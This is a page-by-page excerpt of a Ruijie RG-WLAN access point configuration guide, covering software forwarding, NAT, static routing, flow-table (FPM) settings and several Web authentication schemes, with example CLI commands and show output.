    9.1 Overview On products incapable of hardware-based forwarding, IPv4/IPv6 packets are forwarded through the software. To optimize the software-based forwarding performance, Ruijie introduces IPv4/IPv6 express forwarding through software (Ruijie Express Forwarding, namely REF). REF maintains two tables: forwarding table and adjacency table. The forwarding table is used to store route information. The adjacency table is derived from the ARP table and IPv6 neighbor table, and it contains Layer 2 rewrite(MAC) information for the next hop..
  • Page 512 Configuration Guide Configuring IPv4/IPv6 REF Figure 9-1 A is a router that runs REF. Remarks B, C and D are forwarding devices. Deployment  Run REF on router A. 9.3 Features Basic Concepts IPv4/IPv6 REF involves the following basic concepts: ...
  • Page 513 Configuration Guide Configuring IPv4/IPv6 REF  Packet forwarding path Packets are forwarded based on their IPv4/IPv6 addresses. If the source and destination IPv4/IPv6 addresses of a packet are specified, the forwarding path of this packet is determined. 9.3.1 Load Balancing Policies Load balancing is configured to distribute traffic load among multiple network links.
  • Page 514 Configuration Guide Configuring IPv4/IPv6 REF 9.4.1 Configuring Load Balancing Policies Configuration Effect REF supports the following two kinds of load balancing policies:  Destination address-based load balancing indicates performing hash calculation based on the destination address of the packet. The path with a greater weight is more likely to be selected. This policy is used by default. ...

  • Page 515: Scenario

    Configuration Guide Configuring IPv4/IPv6 REF Configuration Example  Configuring Load Balancing Based on Source and Destination IP Addresses Scenario Figure 9-2 A route prefix is associated with three next hops on router A, namely, link 1, link 2, and link 3. Configuration Configure load balancing based on IPv4 source and destination IP addresses on router A.
  • Page 516 Configuration Guide Configuring IPv4/IPv6 REF punt bcast : 0 9.5 Monitoring Displaying REF Packet Statistics REF packet statistics includes the number of forwarded packets and the number of packets discarded due to various causes. You can determine whether packets are forwarded as expected by displaying and clearing REF packet statistics. Command Description show ip ref packet statistics...
  • Page 517 Configuration Guide Configuring IPv4/IPv6 REF Displaying Packet Forwarding Path Information Packets are forwarded based on their IPv4/IPv6 addresses. If the source and destination IPv4/IPv6 addresses of a packet are specified, the forwarding path of this packet is determined. Run the following commands and specify the IPv4/IPv6 source and destination addresses of a packet.

  • Page 518: Scenario

    Configuration Guide Configuring NAT 10 Configuring NAT 10.1 Overview Network Address Translation (NAT) is a process of translating the IP address in the header of an IP data packet into another IP address. In practice, NAT enables private networks that use unregistered IP addresses to access public networks.

  • Page 519: Scenario

    Configuration Guide Configuring NAT The egress router connects both the intranet and the extranet. Corresponding Protocols  Configure an inside interface and an outside interface for NAT.  Configure static inside source address translation on the egress router. 10.2.2 External Users' Access to an Intranet Server Scenario A PC is located in an extranet while a server (such as a Web server) is located in an intranet, as shown in Figure 10-2.

  • Page 520: Scenario

    Configuration Guide Configuring NAT Corresponding Protocols  Configure an inside interface and an outside interface for NAT.  Configure server port address translation rules on the egress router. 10.2.3 Source/Destination Address Translation for Internal Users Scenario PC 1 is located in private network 1 while PC 2 is located in private network 2, as shown in Figure 10-3. Because the two private networks are separately managed, address overlapping occurs in their IP network segments.
  • Page 521 Configuration Guide Configuring NAT Figure 10-4 The egress router connects both the intranet and the extranet. The servers are deployed in the intranet. Corresponding Protocols  Configure an inside interface and an outside interface for NAT.  Configure TCP load balancing using NAT on the egress router. 10.3 Features Basic Concepts ...
  • Page 522 Configuration Guide Configuring NAT  Dynamic NAT Dynamic NAT establishes temporary mapping relationships between inside local addresses and inside global addresses. The temporary mapping relationships will be removed when unused in a certain period of time. Dynamic NAT can be configured in the following case: An intranet accesses extranet services only but does not provide services, and the number of intranet hosts is greater than the number of global IP addresses.

  • Page 523: Scenario

    Configuration Guide Configuring NAT  Use the ip nat { inside | outside } command to configure the interfaces as connected to the inside and outside.  NAT does not work on a data packet unless a route exists between the outside interface and the inside interface and the data packet meets a certain rule.
  • Page 524 Configuration Guide Configuring NAT  Run the ip nat { inside | outside } command to specify a couple of NAT interfaces.  NAT does not work on a data packet unless a route exists between the outside interface and the inside interface and the data packet meets a certain rule.
  • Page 525 Configuration Guide Configuring NAT  Static/dynamic basic NAT or static/dynamic NAPT can be used for inside source address translation. For details, see the "Basic NAT" and "NAPT" sections.  Configuring Static Translation of Outside Source Address  Static translation of outside source address is not configured by default. ...
  • Page 526 Configuration Guide Configuring NAT  No address pool is configured by default.  Use the ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } command to configure an IP address pool for NAT.  Configuring the ACL ...
  • Page 527 Configuration Guide Configuring NAT 10.3.6 ALG Common NAT can translate the IP address and port in the header of a UDP or TCP packet, but is helpless before fields in application layer data payloads. In many application layer protocols such as multimedia protocols (H.323 and the like), FTP, and SQLNET, the TCP/UDP payload carries address or port information.
  • Page 528 Configuration Guide Configuring NAT ip nat inside source static local-address global-address Defines the static inside source address [ permit-inside ] [ netmask mask ] [ match translation relationship. interface ] Optional configuration. It is used to configure dynamic NAT. ip nat pool address-pool start-address end-address netmask mask...
  • Page 529 Configuration Guide Configuring NAT Defines the dynamic source address ip nat inside source list access-list-number translation relationship. overload { [ pool address-pool ] | [ interface parameter may be omitted. It is used only interface-type interface-number to keep compatibility with mainstream overload vendors' configuration.
  • Page 530 Configuration Guide Configuring NAT Defines an ACL, which matches the virtual host address only. access-list access-list-number permit Ensure that the ACL is an extended ip-address wildcard ACL based on destination IP address matching. inside destination list Defines the dynamic inside destination address translation relationship.
  • Page 531 Configuration Guide Configuring NAT  Configure the LAN interface to connect to the intranet as the NAT inside interface unless otherwise stated.  Configuring the NAT Outside Interface  Mandatory configuration.  Configure the WAN interface to connect to the extranet as the NAT outside interface unless otherwise stated. ...

  • Page 532: Scenario

    Configuration Guide Configuring NAT  Configuring the Address Pool Command ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } Syntax Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses Command...

  • Page 533: Scenario

    A(config)# ip nat pool net200 200.168.12.2 200.168.12.100 netmask 255.255.255.0 A(config)# ip nat inside source list 1 pool net200 A(config)# access-list 1 permit 192.168.12.0 0.0.0.255 Verification Use the show command to display the configuration. Ruijie# show ip nat translations Pro Inside global Inside local Outside local Outside global tcp 200.168.12.200:2063 192.168.12.65:2063 168.168.12.1:23 168.168.12.1:23...
  • Page 534 Configuration Guide Configuring NAT  Optional configuration.  Configure static NAPT in global configuration mode when a small number of users in the intranet need to access the extranet.  Configuring Dynamic NAPT  Optional configuration.  Configure dynamic NAPT in global configuration mode when a large number of users in the intranet need to access the extranet.

  • Page 535: Scenario

    Configuration Guide Configuring NAT Syntax prefix-length prefix-length } Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses Command Global configuration mode Mode...
  • Page 536 A(config)# access-list 1 permit 192.168.12.0 0.0.0.255 A(config)# ip nat inside source static tcp 192.168.12.3 80 200.198.12.1 80 Verification Use the show command to display the configuration. Ruijie# show ip nat translations Pro Inside global Inside local Outside local Outside global tcp 200.168.12.200:2063 192.168.12.65:2063 168.168.12.1:23 168.168.12.1:23...
  • Page 537 Configuration Guide Configuring NAT  Unless otherwise noted, the interface connecting intranet should be configured as the NAT inside interface.  Configuring the NAT Outside Interface  Mandatory configuration.  Unless otherwise noted, the interface connecting extranet should be configured as the NAT outside interface. ...
  • Page 538 Configuration Guide Configuring NAT Syntax Parameter global-address: outside global address Description local-address: inside local address Command Global configuration mode Mode Configuration Usage  Configuring Static Translation of Outside Source Address and Port Command ip nat outside source static { tcp global-address global-port | udp global-address global-port } Syntax local-address local-port Parameter...

  • Page 539: Scenario

    A(config)# access-list 1 permit 192.168.12.0 0.0.0.255 A(config)# ip nat outside source static 192.168.12.3 172.16.10.1 A(config)# ip route 172.16.10.0 255.255.255.0 200.198.12.2 Verification Use the show command to display the configuration. Ruijie# show ip nat translations Pro Inside global Inside local Outside local Outside global tcp 200.168.12.200:2063 192.168.12.65:2063 172.16.10.1:23 168.168.12.3:23...
  • Page 540 Configuration Guide Configuring NAT  No static route is configured or no IP address is configured for the outside interface, so that the router does not know to which interface a data packet should be sent after NAT or from which interface a data packet is received after NAT.

  • Page 541: Scenario

    Configuration Guide Configuring NAT Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses type rotary: type of the NAT address pool. Type rotary indicates that the chance of assigning any address is equal.
  • Page 542 A(config)# ip nat inside destination list 100 pool realhosts A(config)# access-list 100 permit ip any host 10.10.10.100 Verification Use the show command to display the configuration. Ruijie# show ip nat translations Pro Inside global Inside local Outside local Outside global tcp 10.10.10.100:23 10.10.10.2:23 100.100.100.100:1178 100.100.100.100:1178...
  • Page 543 Configuration Guide Configuring NAT  Configuring the NAT Outside Interface  Mandatory configuration.  Unless otherwise noted, the interface connecting extranet should be configured as the NAT outside interface.  Configuring Static NAT  Optional configuration.  Configure static NAT in global configuration mode when a small number of users in the intranet need to access the extranet.
  • Page 544 Configuration Guide Configuring NAT Command Global configuration mode Mode Configuration Usage  Configuring the Address Pool Command ip nat pool address-pool start-address end-address { netmask mask | prefix-length prefix-length } Syntax Parameter address-pool: name of the address pool Description start-address: start IP address end-address: end IP address netmask mask: network mask of the addresses prefix-length prefix-length: length of the network mask of the addresses...

  • Page 545: Scenario

    A(config)# ip nat inside source list 1 pool net200 A(config)# access-list 1 permit 192.168.12.0 0.0.0.255 A(config)# ip nat translation ftp 23 Verification Use the show command to display the configuration. Ruijie# show ip nat translations Pro Inside global Inside local Outside local Outside global tcp 200.168.12.200:2063 192.168.12.65:2063 168.168.12.1:23 168.168.12.1:23...
  • Page 546 Configuration Guide Configuring NAT Notes  At least one inside interface and one outside interface need to be configured for special NAT applications.  The newly configured NAT rules take effect on new flows only but not on any existing flows. Configuration Steps ...
  • Page 547 Configuration Guide Configuring NAT Configuration NAT does not work on a data packet unless a route exists between the outside interface and the inside Usage interface and the data packet meets a certain rule. Therefore, at least one inside interface and one outside interface need to be configured on the router.

  • Page 548: Scenario

    Configuration Guide Configuring NAT Description global-address: outside address permit-inside: permits intranet users to access the local-ip host using global-ip. netmask mask: network-segment-to-network-segment address match interface: specifies the egress interface. Command Global configuration mode Mode Configuration Usage Configuration Example  Implementing the DNS Relay Service Scenario Figure 10-10 Configuration...
  • Page 549 Configuration Guide Configuring NAT Common Errors  The inside or outside interface is not configured. 10.4.7 Configuring the Interval at Which NAT Sends Gratuitous ARP Packets Networking Requirements Configure the interval at which gratuitous ARP packets are sent from addresses in the NAT address pool, so as to avoid address conflicts.
  • Page 550 Configuration Guide Configuring NAT Commands  Configuring the NAT Inside Interface and the NAT Outside Interface Command ip nat { inside | outside } Syntax Parameter inside: inside interface Description outside: outside interface Command Interface configuration mode Mode Configuration NAT does not work on a data packet unless a route exists between the outside interface and the inside Usage interface and the data packet meets a certain rule.

  • Page 551: Scenario

    Configuration Guide Configuring NAT Command Global configuration mode Mode Configuration Usage  Configuring the Interval at Which NAT Sends Gratuitous ARP Packets Command ip nat keepalive [ keealive_out ] Syntax Parameter keealive_out: the interval at which gratuitous ARP packets are sent from the local address of NAT. Description Command Global configuration mode...
  • Page 552 Configuration Guide Configuring NAT A(config)# ip nat inside source list 1 pool net200 A(config)# access-list 1 permit 192.168.12.0 0.0.0.255 A(config)# ip nat keepalive 10 Verification Common Errors  The inside or outside interface is not configured.  NAT rule is not correct. 10.5 Monitoring Clearing Configuration None.
  • Page 553 Configuration Guide Configuring NAT...
  • Page 554 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 IP Routing Configuration 1. Managing Routes 2. Configuring FPM...

  • Page 555: Scenario

    Configuration Guide Managing Routes 1 Managing Routes 1.1 Overview The network service module (NSM) manages the routing table, consolidates routes sent by various routing protocols, and selects and sends preferred routes to the routing table. Routes discovered by various routing protocols are stored in the routing table.

  • Page 556: Scenario

    Configuration Guide Managing Routes Deployment  Configure the address and subnet mask of each interface.  Configure static routes on R 1, R 2, and R 3. 1.2.2 Floating Static Route Scenario If no dynamic routing protocol is configured, you can configure floating static routes to implement dynamic switching of routes to prevent communication interruption caused by the network connection failures.

  • Page 557: Scenario

    Configuration Guide Managing Routes Deployment  Configure the address and subnet mask of each interface.  Configure static routes on R 1, R 2, and R 3. 1.2.3 Load Balancing Static Route Scenario If there are multiple paths to the same destination, you can configure load balancing routes. Unlike floating routes, the administrative distances of load balancing routes are the same.
  • Page 558 Configuration Guide Managing Routes Remarks On the switch, the load is balanced based on the destination IP address by default. On a router, run the ip ref load-sharing original command to configure the load balancing policy of IPv4 routes, or the ipv6 ref load-sharing original command to configure the load balancing policy of IPv6 routes. Deployment ...
  • Page 559 Configuration Guide Managing Routes 1.3.2 Optimal Route Selection Administrative Distance When multiple routing protocols generate routes to the same destination, the priorities of these routes can be determined based on the administrative distance. A smaller administrative distance indicates a higher priority. Equal-Cost Route If multiple routes to the same destination have different next hops but the same administrative distance, these routes are mutually equal-cost routes.
  • Page 560 Configuration Guide Managing Routes (Mandatory) It is used to configure a static route entry. Configuring a Static Route ip route Configures an IPv4 static route. Configures an IPv6 static route. ipv6 route (Optional) It is used to configure the default gateway. Configures an IPv4 default gateway on a L2 ip default gateway device.
  • Page 561 Configuration Guide Managing Routes  Configuration Steps  Configuring a Static IPv4 Route Configure the following command on an IPv4-enabled device. Command ip route network net-mask { ip-address | interface [ ip-address ] } [ distance ] [ tag tag ] [ permanent ] [ weight number ] [description description-text] [ disabled | enabled] [ global ] Parameter network...
  • Page 562 Configuration Guide Managing Routes length. ipv6-address (Optional) Indicates the next-hop address of the static route. You must specify at least one of ipv6-address and interface, or both of them. If ipv6-address is not specified, a static direct route is configured. interface (Optional) Indicates the next-hop exit interface of the static route.

  • Page 563: Scenario

    Configuration Guide Managing Routes Scenario Figure 1-4  Configure interface addresses on each device. Configuration Steps R1# configure terminal R1(config)#interface gigabitEthernet 0/0 R1(config-if-GigabitEthernet 0/0)# ip address 1.1.1.1 255.255.255.0 R1(config-if-GigabitEthernet 0/0)# exit R1(config)#interface gigabitEthernet 0/2 R1(config-if-GigabitEthernet 0/2)# ip address 1.1.12.1 255.255.255.0 R1(config-if-GigabitEthernet 0/0)# exit R1(config)#interface gigabitEthernet 0/3 R1(config-if-GigabitEthernet 0/3)# ip address 1.1.13.1 255.255.255.0...
  • Page 564 Configuration Guide Managing Routes  Configure static routes on each device. R1# configure terminal R1(config)# ip route 1.1.2.0 255.255.255.0 GigabitEthernet 0/2 1.1.12.2 R1(config)# ip route 1.1.3.0 255.255.255.0 GigabitEthernet 0/3 1.1.13.3 R2# configure terminal R2(config)# ip route 1.1.1.0 255.255.255.0 GigabitEthernet 0/1 1.1.12.1 R2(config)# ip route 1.1.3.0 255.255.255.0 GigabitEthernet 0/3 1.1.23.3 R3# configure terminal R3(config)# ip route 1.1.2.0 255.255.255.0 GigabitEthernet 0/2 1.1.23.2...

  • Page 565: Scenario

    Configuration Guide Managing Routes 1.1.3.0/24 [1/0] via 1.1.23.3, GigabitEthernet 0/3 1.1.12.0/24 is directly connected, GigabitEthernet 0/1 1.1.12.2/32 is local host. 1.1.23.0/24 is directly connected, GigabitEthernet 0/3 1.1.23.2/32 is local host. R3# show ip route Codes: C - Connected, L - Local, S - Static R - RIP, O - OSPF, B - BGP, I - IS-IS N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2 E1 - OSPF external type 1, E2 - OSPF external type 2...
  • Page 566 Configuration Guide Managing Routes R2(config-if-GigabitEthernet 0/0)#ipv6 address 1111:2323::1/64 R2(config-if-GigabitEthernet 0/0)# exit R2(config)#interface gigabitEthernet 0/1 R2(config-if-GigabitEthernet 0/1)# ipv6 address 1111:1212::2/64  Configure static routes on each device. R1# configure terminal R1(config)# ipv6 route 1111:2323::0/64 gigabitEthernet 0/1 R2# configure terminal R2(config)# ipv6 route 1111:1111::0/64 gigabitEthernet 0/1 ...
  • Page 567 Configuration Guide Managing Routes 1111:2323::/64 via GigabitEthernet 0/0, directly connected 1111:2323::1/128 via GigabitEthernet 0/0, local host 1111:1212::/64 via GigabitEthernet 0/1, directly connected 1111:1212::1/128 via GigabitEthernet 0/1, local host 1111:1111::/64 [1/0] via GigabitEthernet 0/1, directly connected FE80::/10 via ::1, Null0 FE80::/64 via GigabitEthernet 0/0, directly connected FE80::2D0:F8FF:FEFB:C092/128 via GigabitEthernet 0/0, local host FE80::/64 via GigabitEthernet 0/1, directly connected FE80::2D0:F8FF:FEFB:C092/128 via GigabitEthernet 0/1, local host...
  • Page 568 Configuration Guide Managing Routes hop in the routing table. distance (Optional) Indicates the administrative distance of the static route. The administrative distance is 1 by default. (Optional) Indicates the tag of the static route. The tag is 0 by default. permanent (Optional) Indicates the flag of the permanent route.

  • Page 569: Scenario

    Configuration Guide Managing Routes Defaults By default, no static default route is configured. Command Global configuration mode Mode Usage Guide The simplest configuration of this command is ipv6 route ::/0 ipv6-gateway  Configuring the IPv4 Default Network on a L3 Device Command ip default-network network Parameter...
  • Page 570 Configuration Guide Managing Routes R2(config-if-GigabitEthernet 0/0)# ip address 1.1.2.1 255.255.255.0 R2(config-if-GigabitEthernet 0/0)# exit R2(config)#interface gigabitEthernet 0/1 R2(config-if-GigabitEthernet 0/1)# ip address 1.1.12.2 255.255.255.0 R2(config-if-GigabitEthernet 0/0)# exit  Configure an IPv6 default gateway on R 1. R1# configure terminal R1(config)# ip route 0.0.0.0 0.0.0.0 GigabitEthernet 0/1 1.1.12.2 R2# configure terminal R2(config)# ip route 0.0.0.0 0.0.0.0 GigabitEthernet 0/1 1.1.12.1 ...
  • Page 571 Configuration Guide Managing Routes Defaults By default, the number of equal cost routes is 32. Command Global configuration mode Mode Usage Guide Run this command to configure the maximum number of next hops in the equal-cost route. In load balancing mode, the number of routes on which traffic is balanced does not exceed the configured number of equal-cost routes.

  • Page 572: Scenario

    Configuration Guide Managing Routes Description Defaults By default, IPv6 routing is enabled. Command Global configuration mode Mode Usage Guide Run this command to disable IPv6 routing. If the device functions only as a bridge or a VoIP gateway, the device does not need to use the IPv6 routing function of the RGOS software. In this case, you can disable the IPv6 routing function of the RGOS software.
  • Page 573 Configuration Guide Managing Routes R1(config)#ip route 1.1.4.0 255.255.255.0 1.1.12.2 R1(config)#ip route 1.1.5.0 255.255.255.0 1.1.12.2 R1(config)# ip static route-limit 2 % Exceeding maximum static routes limit.  Check the static routes that really take effect in the routing table. Verification R1(config)# show ip route Codes: C - Connected, L - Local, S - Static R - RIP, O - OSPF, B - BGP, I - IS-IS N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2...
  • Page 574 Configuration Guide Managing Routes Debugs default network debug nsm kernel default-network management. Debugs internal events of route debug nsm events management. Debugs sending route debug nsm packet send management and routing protocol messages. Debugs receiving route debug nsm packet recv management and routing protocol messages.

  • Page 575: Scenario

    Configuration Guide Configuring FPM 2 Configuring FPM 2.1 Overview The flow platform (FPM) is a platform for the acceleration of packet service processing. Because IP packets have the flow attribute, the FPM provides services with the function to identify the flow attribute of IP packets before service processing, so as to improve service processing efficiency.

  • Page 576: Scenario

    Configuration Guide Configuring FPM 2.2.2 Configuring Loose TCP Status Check Scenario 2.2.2.1 Loose TCP status check should be configured on the device to prevent flow interruption during active/standby switchover of the device. Then a connection can be established and packets can be forwarded as long as one end sends an ACK packet, so that the connection is not interrupted at all during the active/standby switchover.

  • Page 577: Scenario

    Configuration Guide Configuring FPM 2.3.3 Flow Entry Aging 2.3.3.1 Working Principle The aging of a flow entry means that the device actively withdraws the flow entry when there is no data exchange in a certain period of time. If a session attack occurs, the flow table will be full, causing the failure to establish sessions. The aging of the flow table is designed to solve this problem.
  • Page 578 Configuration Guide Configuring FPM 2.3.7 Loose TCP Status Check 2.3.7.1 Working Principle A complete handshake process is required for the establishment of a legitimate TCP connection. In some cases such as active/standby switchover, however, probably a handshake process has been performed for the current TCP connection but only no corresponding information exists.

  • Page 579: Scenario

    Configuration Steps Disable transparent transmission of packets without flow establishment when the flow table is full. Ruijie# configure terminal Ruijie(config)# ip session direct-trans-disable Verification Use the show run command to verify that the configuration includes ip session direct-trans-disable. 2.4.1.6 Common Errors 2.4.2 Configuring the Flow Entry Aging Time...
  • Page 580 Configuration Guide Configuring FPM 2.4.2.3 Configuration Steps Configuring the Aging Time  Optional configuration.  By default, a flow entry ages within the default aging time. If the default aging time does not meet the requirement, you can use the ip session timeout command to change it. The longer the aging time, the longer the time-to-live (TTL) of the flow entry.

  • Page 581: Scenario

    Set the aging time of flows in udp-established status to 120 seconds. Ruijie# configure terminal Ruijie(config)# ip session timeout udp-established 120 Verification Check the aging time of flows in udp-established status on the device. The aging time should be 120 seconds.

  • Page 582: Configuration Steps

    Configuration Guide Configuring FPM 2.4.3 Configuring the Number of Packets Permitted in a Flow 2.4.3.1 Networking Requirements  An attacker may send a large number of packets of a certain type to wage a traffic attack, in which case other types of packets cannot be processed in time.

  • Page 583: Scenario

    Steps permitted to pass in each ICMP flow in icmp-started status to 10. Ruijie# configure terminal Ruijie(config)# ip session threshold icmp-started 10 Verification Check configuration information about the number of packets permitted to pass in each ICMP flow in icmp-started status. The number should be 10.

  • Page 584: Scenario

    2.4.4.5 Configuration Example Scenario The TCP status tracing function needs to be enabled on the current wireless forwarding device. Configuration Steps Enable the TCP status tracing function on the device. Ruijie# configure terminal Ruijie(config)# ip session tcp-state-inspection-enable Verification show command verify that...

  • Page 585: Scenario

    Configuration Enable the strict packet status tracing function on the forwarding device. Steps Ruijie# configure terminal Ruijie(config)# ip session track-state-strictly Verification Use the show run command to verify that the configuration includes ip session track-state-strictly. 2.4.5.6 Common Errors 2.4.6 Configuring Loose TCP Status Check 2.4.6.1 Networking Requirements...

  • Page 586: Scenario

    Configuration Steps Enable the loose TCP status check function on the device. Ruijie# configure terminal Ruijie(config)# ip session tcp-loose Verification Use the show run command to verify that the configuration includes ip session tcp-loose. 2.4.6.6 Common Errors 2.5 Monitoring 2.5.1.1 Clearing Various Information...
  • Page 587 Configuration Guide Configuring FPM 2.5.1.2 Displaying the Running Status Function Command Displays the counters about the IPv4 show ip fpm counters packets Displays the counters about the IPv6 show ip v6fpm counters packets Displays IPv4 packet flow information show ip fpm flows Displays IPv4 packet flow information show ip fpm flows filter except specific IPv4 packet flows...
  • Page 588 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 Security Configuration 1. Configuring Web Authentication 2. Configuring AAA 3. Configuring RADIUS 4. Configuring 802.1X 5. Configuring ARP Check 6. Configuring Gateway-targed ARP Spoofing Prevention 7. Configuring Global IP-MAC Binding 8. Configuring DHCP Snooping 9.
  • Page 589 14. Configuring SSH 15. Configuring Content Audit...

  • Page 590: Web Authentication

    Ruijie Authentication Versions There are three versions of Ruijie Web authentication, including Ruijie First-Generation Web Authentication, Ruijie Second-Generation Web Authentication, and Ruijie Internal Portal (iPortal) Web Authentication. The Web authentication process varies with authentication versions. For details, see Section 1.3 "Features".

  • Page 591: Scenario

    Configuration Guide Configuring Web Authentication  HTTP: RFC1945 and RFC2068  HTTPS: RFC2818  SNMP: RFC1157 and RFC 2578  RADIUS: RFC2865, RFC2866, and RFC3576  For the standards related to MAC SMS authentication, see the CMCC WLAN Device Interface Standards V3.1.0_20130901 (MAC Address-Based Authentication Extension), Zhejiang CMCCWLAN Fast Authentication Scheme –...
  • Page 592  Configure AAA and method lists on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).  Configure the IP address of the SAM server on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).  Configure the names of the Web authentication method lists on the NAS (for only Ruijie Second-Generation and iPortal Web Authentication).
  • Page 593 RADIUS server, or traffic detection or port status detection performed by the NAS. In Ruijie iPortal Web Authentication, a logout action may be triggered by the voluntary logout of a user through clicking the Logout button on the online page, a kickout...
  • Page 594  In Ruijie First-Generation Web Authentication, Accounting Stop packets are sent by the portal server. In Ruijie Second-Generation Web Authentication, Accounting Stop packets are sent by the NAS, the same as Ruijie iPortal Web Authentication. The selection of the Web authentication versions depends on the type of the portal server in use.
  • Page 595 After the user is authenticated, the portal server notifies the NAS that the client has passed authentication, and the NAS allows the client to access resources on the Internet. Figure 1-2 shows the flowchart of Ruijie First-Generation Web Authentication by using an AP as the NAS. Figure 1-2 Flowchart of Ruijie First-Generation Web Authentication...

  • Page 596: Scenario

    Configuration Guide Configuring Web Authentication First-generation client logout process: There are two scenarios of client logout. One scenario is detected by the NAS that a client gets offline for the maximum online time is out, the upper traffic limit is reached, or the link is disconnected. The other scenario is detected by the portal server that a client logs out by clicking the Logout button on the logout page or the keep-alive page is invalid.
  • Page 597 Enabling Ruijie First-Generation Web Authentication By default, Ruijie First-Generation Web Authentication is disabled. Run the web-auth enable command in interface configuration mode to enable Ruijie First-Generation Web Authentication on the client-connected ports. After Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL.
  • Page 598 The SNMP Trap/Inform function is configured to enable the NAS to inform the portal server of user logout. 1.3.2 Ruijie Second-Generation Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication.

  • Page 599: Scenario

    The NAS initiates authentication to the RADIUS server and returns the authentication result to the portal server. The portal server displays the authentication result (success or failure) to the user on a page. Figure 1-3 Flowchart of Ruijie Second-Generation Web Authentication Second-generation client logout process: There are two scenarios of client logout.
  • Page 600 The communication key is used to encrypt URL parameters to avoid information disclosure.  Enabling Ruijie Second-Generation Web Authentication By default, Ruijie Second-Generation Web Authentication is disabled. Run the web-auth enable {eportalv2 | template-name v2} command in interface configuration mode to enable Ruijie Second-Generation Web Authentication on the client-connected ports.
  • Page 601 Configuring an AAA Method List for Ruijie Second-Generation Web Authentication By default, no AAA method list is configured for Ruijie Second-Generation Web Authentication. Run the aaa authentication web-auth command in global configuration mode to configure an AAA method list for Ruijie Second-Generation Web Authentication.
  • Page 602 NAS: Is an access-layer device in a network. It is directly connected to clients in wired or wireless networks and must be enabled with Ruijie iPortal Web Authentication. The NAS resolves the account information that clients enter on a Webpage and sends authentication requests to the RADIUS server. It determines whether clients can access the Internet according to authentication results and pushes the authentication results to the browsers.
  • Page 603 Enabling Ruijie iPortal Web Authentication By default, Ruijie iPortal Web Authentication is disabled. Run the web-auth enable iportal command in interface configuration mode to enable Ruijie iPortal Web Authentication on the client-connected ports. After Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL.
  • Page 604 Configuring an AAA Method List for Ruijie iPortal Web Authentication By default, no AAA method list is configured for Ruijie iPortal Web Authentication. Run the aaa authentication iportal command in global configuration mode to configure an AAA method list for Ruijie iPortal Web Authentication.
  • Page 605 The following figure shows the process where an STA not bound with a MAC address associates the SSID enabled with MAC address-based SMS authentication to access the Internet. Compared with Ruijie Second-Generation Web Authentication, MAC address-based SMS authentication is added with the procedures of querying MAC address binding and notifying the bound portal server of user login/logout.
  • Page 606 Configuration Guide Configuring Web Authentication  SMS Authentication Process for Bound STAs...
  • Page 607 Configuration Guide Configuring Web Authentication After an STA is bound with a MAC address, the user does not need to open the browser to perform authentication for Internet access. Network access is automatically completed after the STA is associated with a network, which greatly facilitates wireless network access.
  • Page 608 AC and can be viewed on the AC. 1.3.6 WiFiDog Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication.
  • Page 609 Configuration Guide Configuring Web Authentication Authentication server: Provides the authentication service. The authentication server negotiates with the portal server to determine the protocol (for example, RADIUS) used by authentication. Main process of WiFiDog Web authentication: Before authentication, the NAS intercepts all HTTP requests from a client and redirects these requests to the iPortal server.

  • Page 610: Scenario

    Configuration Guide Configuring Web Authentication Figure 1-5 Flowchart of WiFiDog Web Authentication Client logout process: There are two scenarios of client logout. One scenario is detected by the NAS that a client gets offline for the maximum online time is out, the upper traffic limit is reached, or the link is disconnected. The other scenario is detected by the portal server that a client logs out by clicking the Logout button on the logout page.
  • Page 611 After WiFiDog Web authentication is enabled, the unauthenticated clients connecting to a port will be redirected to the Webauth URL. 1.3.7 WeChat Web Authentication HTTP Interception Same as the HTTP interception technology of Ruijie First-Generation Web Authentication. HTTP Redirection...
  • Page 612 Configuration Guide Configuring Web Authentication Same as the HTTP redirection technology of Ruijie First-Generation Web Authentication. Working Principle The networking topology of WeChat Web authentication is the same as shown in Figure 1-1. Roles involved in WeChat Web authentication: User: Is who sets up a Wi-Fi connection through WeChat to access the Internet.
  • Page 613 Configuration Guide Configuring Web Authentication WeChat client. The WeChat client determines that Internet access authorization is successful based on this parameter. A page indicating that a Wi-Fi connection is set up successfully is displayed on the WeChat client. Figure 1-6 QR Code Scan Process in WeChat-Based Wi-Fi Connection Authentication Process of the Internet access of multiple mobile devices by scanning dynamic QR codes on a PC: A user starts a PC to set up a Wi-Fi connection and chooses to connect to an SSID (steps 1 and 2).
  • Page 614 Configuration Guide Configuring Web Authentication Figure 1-7 Process Where Multiple Mobile Devices Access the Internet by Scanning Dynamic QR Codes on a PC The NAS detects logout when a user's time is out, the data quota is reached, or the link is disconnected. The NAS gets a client offline with traffic lower than the threshold based on the parameters of user online traffic detection.
  • Page 615 Configuration Guide Configuring Web Authentication  Configuring the WeChat Webauth URL By default, no WeChat Webauth URL is configured. Run the service-url {url-string } command in template configuration mode to configure the WeChat Webauth URL. The URL address is used for the communication between the NAS and portal server. ...
  • Page 616 STA to pass. The aging time of the entry is specified by the seconds parameter. 1.4 Configuration Configuration Description and Command (Mandatory) It is used to set the basic parameters of Ruijie First-Generation Web Authentication. Configures the first-generation Webauth web-auth template eportalv1 template.
